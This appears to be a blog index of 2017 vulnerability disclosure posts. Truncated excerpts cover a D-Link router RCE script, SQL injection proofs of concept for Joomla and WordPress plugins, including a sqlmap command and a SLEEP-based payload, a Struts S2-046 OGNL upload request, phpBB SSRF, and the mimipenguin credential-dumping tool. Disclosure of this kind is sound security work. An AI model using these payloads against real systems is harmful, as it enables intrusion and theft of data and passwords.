• D-Link DIR8xx Remote Code Execution Vulnerability
    Script download: hnap import requests as rq import struct IP = "192.168.0.1" PORT = "80" # Can differ in different version of routers and versions of firmware # SYSTEM_ADDRESS = 0x1B570 # DIR-890L_REVA_FIRMWARE_PATCH_v1.11B02.BETA01 SYSTEM_ADDRESS = 0x1B50C # DIR-890L_REVA_FIRMWARE_1.10.B07 def _str(address): ...
    Author: unhonker | Published: September 16, 2017 | Category: Vulnerability Disclosure | Views: 843 | Tags:
  • Joomla Photo Contest 1.0.2 SQL Injection Vulnerability
    # # # # # # Exploit Title: Joomla! Component Photo Contest 1.0.2- SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: http://keenitsolution.com/ # Software Link: https://codecanyon.net/item/photo-contest-joomla-extension/13268866 # Demo: http://photo.keenitsolution.com/ # Version: 1.0.2 # Category: Webapps # Tested on: Wi...
    Author: unhonker | Published: August 29, 2017 | Category: Vulnerability Disclosure | Views: 779 | Tags:
  • phpBB 3.2.0 Server Side Request Forgery
    title: Server Side Request Forgery Vulnerability product: phpBB vulnerable version: 3.2.0 fixed version: 3.2.1 CVE number: impact: Medium homepage: https://www.phpbb.com/ found: 2017-05-21 by: Jasveer Singh (Office Kuala Lumpur) SEC Consult V...
    Author: unhonker | Published: August 7, 2017 | Category: Vulnerability Disclosure | Views: 1,117 | Tags:
  • WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection
    # Version: 4.2.2 # Tested on: Ubuntu 16.04 1 – Description: Type user access: register user. $_POST['CatID'] is not escaped. Ultimate Product Catalogue 4.2.2 Sql Injection 2 – Proof of Concept: 1 – Login as regular user (created using wp-login.php?action=register): 2 – Using: *delete “*” in code* 3 – Timeline: – 22/05...
    Author: unhonker | Published: June 28, 2017 | Category: Vulnerability Disclosure | Views: 2,010 | Tags:
  • WordPress Huge-IT Video Gallery 2.0.4 SQL Injection
    Advisory ID: DC-2017-01-009 SQL injection Vulnerable Function: $wpdb->get_var( $query ); Vulnerable Variable: $_POST['cat_search'] Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery Vulnerable Body: cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEE...
    Author: unhonker | Published: May 30, 2017 | Category: Vulnerability Disclosure | Views: 1,898 | Tags:
  • WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability
    1. Description An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database. The get parameter ‘kc_ad’ is vulnerable. 2. Proof of concept sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&ver=2.0""...
    Author: unhonker | Published: April 26, 2017 | Category: Vulnerability Disclosure | Views: 1,946 | Tags:
  • mimipenguin, a powerful password-grabbing tool for Linux
    Download: https://github.com/huntergregal/mimipenguin Requires root privileges. Tested successfully in the following environments: Kali 4.3.0 (rolling) x64 (gdm3) Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2) Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2) XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2) VSFTPd 3.0.3-8+b1 (Active FTP client connections...
    Author: unhonker | Published: April 6, 2017 | Category: Personal Interest | Views: 1,694 | Tags:
  • S2-046 PoC
    POST /doUpload.action HTTP/1.1 Host: localhost:8080 Content-Length: 10000000 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z Connection: close ------WebKitFormBoundaryAnmUgTEhFhOZpr9z Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatche...
    Author: unhonker | Published: March 21, 2017 | Category: Vulnerability Disclosure | Views: 2,394 | Tags:
  • Fiyo CMS 2.0.6.1 Privilege Escalation Vulnerability
    # Exploit Title: Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1 # Google Dork: no # Date: 11-03-2017 # Exploit Author: @rungga_reksya, @dvnrcy # Vendor Homepage: http://www.fiyo.org # Software Link: https://sourceforge.net/projects/fiyo-cms # Version: 2.0.6.1 # Tested on: Windows Server 2012 Datacent...
    Author: unhonker | Published: March 13, 2017 | Category: Vulnerability Disclosure | Views: 1,945 | Tags:
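  • st2-045 Test Tool
    No doubt plenty of ops folks will be working overtime patching again. This tool is intended only for checking whether your own assets are affected by this vulnerability; do not use it for any other purpose, or you bear the consequences yourself. Test tool: st2-045 ihonker edition. Remediation: upgrade the st2 framework.
    Author: unhonker | Published: March 7, 2017 | Category: Vulnerability Disclosure | Views: 3,941 | Tags: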